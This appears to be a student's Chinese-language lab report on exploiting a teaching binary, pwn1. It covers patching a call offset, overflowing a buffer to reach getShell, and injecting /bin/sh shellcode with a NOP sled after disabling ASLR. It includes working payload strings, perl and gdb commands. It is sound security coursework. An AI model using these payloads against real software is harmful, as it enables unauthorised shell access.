Exp1 PC平台逆向破解(5)M
实践内容
- 实践对象是一个可执行文件pwn1
- 本程序的正常执行顺序应该是main函数调用foo函数,foo函数输出用户输入的字符串。
- 本程序还包含了另一个代码片段getshell,会返回一个可用的shell值,在正常的执行状况中该段代码不会被执行,而我们此次实践的内容就是对可执行文件进行攻击,从而让程序执行到此段代码。
实践要求
2.1掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码(0.5分)
2.2掌握反汇编与十六进制编程器 (0.5分)
2.3能正确修改机器指令改变程序执行流程(0.5分)
2.4能正确构造payload进行bof攻击(0.5分)
实践基础知识:
(1)NOP指令即“空指令”(机器码:90)。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。所以NOP指令自然也会占用执行一个指令的CPU时间片。
(2)JNE是一个条件转移指令(机器码:75)。当ZF=0,转至标号处执行。
(3)JE是一个条件转移指令(机器码:74)。如果相等则跳转。
(4)JMP是无条件转移指令。段内直接短转Jmp short(机器码:EB)段内直接近转移Jmp near(机器码:E9)段内间接转移Jmp word(机器码:FF)段间直接(远)转移Jmp far(机器码:EA)
(5)CMP为比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果(机器码:39)。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。
实践过程
本次实践有三种实现方式
- 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
- 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
- 注入一个自己制作的shellcode并运行这段shellcode。
手工修改可执行文件
再动手之前应该知道反汇编指令是
objdump -d pwn1(文件名)|more
动手之前应该准备好32位的执行环境
64位Kali无法顺利执行pwn1问题的解决方案
开始实践
- 对pwn1进行备份并将副本命名为自己学号"20155329"并用副本进行实践。 使用cp 命令进行复制,例如cp pwn1 20155329
- 对可执行文件进行反汇编
objdump -d 20155329 | more
由反汇编结果可以看出
图一
- e8对应call命令
- e8后的绿色部分为抵用的foo函数的偏移地址。
图二
- main地址是080484af、
- foo地址是08048491、
- getshell的地址是0804847d。
综上所述
- foo函数的地址为08048291,getshellh函数的地址为0804847d,用16进制的减法我们可以精确的算出getshell比foo低了14,也就在原来的基础上减去14即可。而在linux环境下,采用小端存储的方式,也就是说d7为低位,就是说将到d7减去14即可,也就是变成c3。,我们使用vim编辑器对地址进行修改。
- 使用vim打开可执行文件20155329
- 此时文本为乱码,用“%!xxd”指令将文本转换成16进制文件来进行操作。
- **修改偏移地址后,使用“%!xxd -r”将16进制文件转换成原文件保存退出。
运行可执行文件20155329
通过构造输入参数,造成BOF攻击,改变程序执行流
- 在实践一的基础上来进行实践二
- 大致思路是找到返回堆栈地址,gets hell将此地址覆盖,使程序执行getshell段的代码
使用gdb确定输入字符串哪几个字符会覆盖到返回地址
-
如果输入字符串2015532922222222333333334444444412345678,那 4444 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell。
-
在实践一中知道getshell的地址是0804847d
-
getShell的内存地址,在未启用ALSR的主机上是固定不变的,通过反汇编时可以看到,即 0x804847d 。接下来要确认下字节序,简单说是输入 11111111222222223333333344444444x08x04x84x7d ,还是输入 11111111222222223333333344444444x7dx84x04x08 。
对比之前 eip 0x34333231 0x34333231 ,正确应用输入11111111222222223333333344444444x7dx84x04x08。 -
确定输入 11111111222222223333333344444444x7dx84x04x08来覆盖返回值。
构造输入字符串
由为我们没法通过键盘输入 x7dx84x04x08 这样的16进制值,所以先生成包括这样字符串的一个文件。x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。
利用Perl构建input文件进行输入,键入指令 perl -e 'print "11111111222222223333333344444444x7dx84x04x08x0a"' > input
注入Shellcode并执行
准备一段Shellcode
- Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。漏洞利用中最关键的是Shellcode的编写
准备工作
execstack -s pwn1 //设置堆栈可执行
execstack -q pwn1//查询文件的堆栈是否可执行
X pwn1
more /proc/sys/kernel/randomize_va_space
2
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space
0
- 此处可参考缓冲区溢出实验学习
构造要注入的payload。
结构为:nops+shellcode+retaddr。
nop一为是了填充,二是作为“着陆区/滑行区”。
我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode。
perl -e 'print "x90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90x4x3x2x1x00"' > input_shellcode
上面最后的x4x3x2x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。
特别提醒:最后一个字符千万不能是x0a。不然下面的操作就做不了了。
- 注意结构
- 接下来寻找retaddr的地址了
1.打开一个终端注入这段攻击buf: (cat input_shellcode;cat) | ./pwn1
2.再开另外一个终端,用gdb来调试pwn1这个进程。
ps -ef | grep pwn1 //查看进程号
(gdb)attach pid
3. 设置断点来查看注入的buf地址
(gdb) disassemble foo
0x080484ae <+29>: ret //断在这,这时注入的东西都大堆栈上了
//ret完,就跳到我们覆盖的retaddr那个地方了
End of assembler dump.
(gdb) break *0x080484ae
Breakpoint 1 at 0x80484ae
//在另外一个终端中按下回车,这就是前面为什么不能以x0a来结束 input_shellcode的原因。
(gdb) c
Continuing.
Breakpoint 1, 0x080484ae in foo ()
(gdb) info r esp
esp 0xffffd3ac 0xffffd3ac
(gdb) x/16x 0xffffd3ac
- 此时知道我们的结构是:anything+retaddr+nops+shellcode。
- 所以shellcode紧挨着retaddr地址,所以shell code地址位0xffffd3ac+4 = 0xffffd3b0
- perl -e 'print "A" x 32;print "x20xd3xffxffx90x90x90x90x90x90x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80x90xb0xd3xffxffx00"' > input_shellcode
- 成功了
实验中遇见的问题
共享文件夹无法正常使用
- 重新安装 VMware tools
安装32位的运行库时出现问题
-
问题:无法获得锁 /var/lib/dpkg/lock - open (11: 资源暂时不可用)
E: 无法锁定管理目录(/var/lib/dpkg/),是否有其他进程正占用它?” -
解决办法:
-
sudo rm /var/cache/apt/archives/lock
-
sudo rm /var/lib/dpkg/lock
-
问题:关于更多Shellcode的知识,请参考Shellcode基础。Shellcode基础无法打开
实验收获和感想
- 收获:本次实验中学习了汇编相关知识,做到了能看懂基本汇编指令,地址的运算gdb调试。大概就是这些吧。
- 感想,本次实验开始就遇见了大问题,在环境的搭建上出了好多问题,虽然都解决了,但是也花费了大部分的时间,在装vmtools的时候听信了安装一直回车,导致后面的共享文件夹无法使用等问题,重新安装也是同样的问题,重启后又不能使用,最后还是找到一个和我遇见同样问题的大佬,看完他的博客,去添加源,更新源,安装之后解决了这一问题 。所以说还是要细心细心再细心才能减少之后的麻烦。
什么是漏洞?漏洞有什么危害?
-
什么是漏洞
- 漏洞是设计人员在设计过程中遗留下来 的一些缺陷,往往被不法分子利用,进 行攻击。所以一个程序越大,可能出现的漏洞就越多。
-
漏洞有什么危害
- 漏洞往往被不法分子利用,攻击用户计算机,非法获取,篡改,删除数据。反正就是做一些损人利己的事情,甚至损人不利己的事。